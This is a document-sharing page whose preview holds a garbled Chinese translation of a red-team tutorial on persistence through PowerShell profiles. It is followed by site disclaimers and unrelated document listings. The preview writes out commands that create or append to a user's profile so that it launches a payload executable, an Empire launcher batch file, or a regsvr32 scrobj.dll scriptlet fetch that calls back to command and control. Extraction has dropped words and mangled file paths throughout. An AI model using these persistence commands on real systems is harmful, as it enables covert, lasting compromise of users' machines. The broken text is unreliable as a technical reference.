


下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、PowerShell 配置文件是一个PowerShell ,它 系统管理员和用户自定义其环境,并在PowerShell会话启动时执行特定命令。它类似于管理员大量使用的登录 ,用于为用户 网络驱动器和打印机或收集有关系统的信息。如果用户定期在PowerShell上执行工作,修改PowerShell概要文件 的内容将 对手或red团队将其用作持久性机制。这种技术可以在当前用户的上下文中执行。PowerShell配置文件在“WindowsPowerShell”文件夹中,默认情况下,该文件夹对用户隐藏。如果已将负载放入磁盘,则可以使用“Start-Process”cmdlet指向可执行文件的位置。“测
2、试路径$Pro le”确定当前用户是否存在配置文件。如果配置文件不存在,命令“新项-路径-配置文件类型-文件强制”将为当前用户创建一个概要文件,“out文件”将用新内容重写概要文件。PowerShell配置文件启动过程PowerShell下次启动时将执行配置文件的内容,并使用命令和控件建立连接。echo $profileTest-Path $profileNew-Item -Path $profile -Type File Force$string = 'Start-Process "C:tmppentestlab.exe"'$string | Out-Fi
3、le -FilePath "C:UserspentestlabDocumentsWindowsPowerShellMicrosoft.PowerShell_profile.ps 1" -Append持久性 PowerShell配置文件可执行与启动过程类似,“ Invoke-Item ” cmdlet可用于执行项目的默认操作,即运行文件,打开应用程序等。launcher.bat是Empire生成的有效负载,具有自我删除功能在执行时作为更 的选择,因为它创建新流程。PowerShell配置文件 BAT文件当PowerShell在系统上再次启动时,将执行该文件,并且 将与命令和控
4、件进行通讯。执行 像上面的示例那样在系统上创建新进程,而是将使用现有的PowerShell进程。echo $profileTest-Path $profileNew-Item -Path $profile -Type File ForceAdd-Content $profile "Invoke-Item C:tmplauncher.bat"$string | Out-File -FilePath "C:UserspentestlabDocumentsWindowsPowerShellMicrosoft.PowerShell_profile.ps 1" -
5、Append持久性-PowerShell Pro le Empirecmdlet“ Invoke-Command ” 的用法执行命令。regsvr32方法可以用作隐藏选项,因为它可以规避未正确配置的应用程序白解决方案,并且可以从位置执行scriptlet。PowerShell配置文件执行命令echo $profileTest-Path $profileNew-Item -Path $profile -Type File Force$string = 'Invoke-Command -ScriptBlock regsvr32 /s /n /u/i:scrobj.dll '$str
6、ing | Out-File -FilePath "C:UserspentestlabDocumentsWindowsPowerShellMicrosoft.PowerShell_profile.ps 1" -AppendMetasploit框架包含一个模块(web_delivery),该模块可以生成并提供 scriptlet文件。但是, 其 令和 (C2)框架(例如PoshC2)也支持此功能,并且与Metasploit相比,可以提供扩展的功能。持久性 PowerShell配置文件Regsvr32使用多个命令对PowerShell配置文件进行大量修改会向用户一条有关增加加载时间的消息。但是,执行一个命令产生任何消息,有效负载将在运行,并且用户注意到任何差异。马特·尼 尔森(Matt Nelson)过去做过一些工作,在他的博客中已经展示了有关通过使用Excel 宏作为传递机制来创建和PowerShell配置文件的工作。通过将任意命令在配置文件中,PowerShell配置文件为代码执
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 【正版授权】 ISO/IEC 15415:2024 EN Automatic identification and data capture techniques - Bar code symbol print quality test specification - Two-dimensional symbols
- 2025年度化工生产工厂技术许可合同协议
- 2025年城市管道天然气项目建议书
- 设备管理科设备维护与更新计划
- 提升仓库服务质量的个人策略计划
- 社区个人工作计划改善社区供水设施
- 2025年特种大型铝合金型材合作协议书
- 新闻媒体安全管理的必要性计划
- 社团交流合作的网络平台计划
- 2025年中大型重载轴承项目建议书
- 2025年湖南环境生物职业技术学院高职单招职业适应性测试近5年常考版参考题库含答案解析
- 2025年道路运输企业安全生产管理人员考试题(附答案)
- 建设工程质量安全监督人员考试题库含答案
- 居间合同标准范本
- 电气控制技术项目化教程 第2版 课件 项目1、2 低压电器的选用与维修、电动机直接控制电路
- 2025年上半年山东人才发展集团限公司社会招聘易考易错模拟试题(共500题)试卷后附参考答案
- 2025年上海民航职业技术学院高职单招职业适应性测试近5年常考版参考题库含答案解析
- 2024年山东理工职业学院高职单招语文历年参考题库含答案解析
- 《生命与宗教》课件
- 《中华人民共和国学前教育法》专题培训
- 软件公司K3渠道招募制度
评论
0/150
提交评论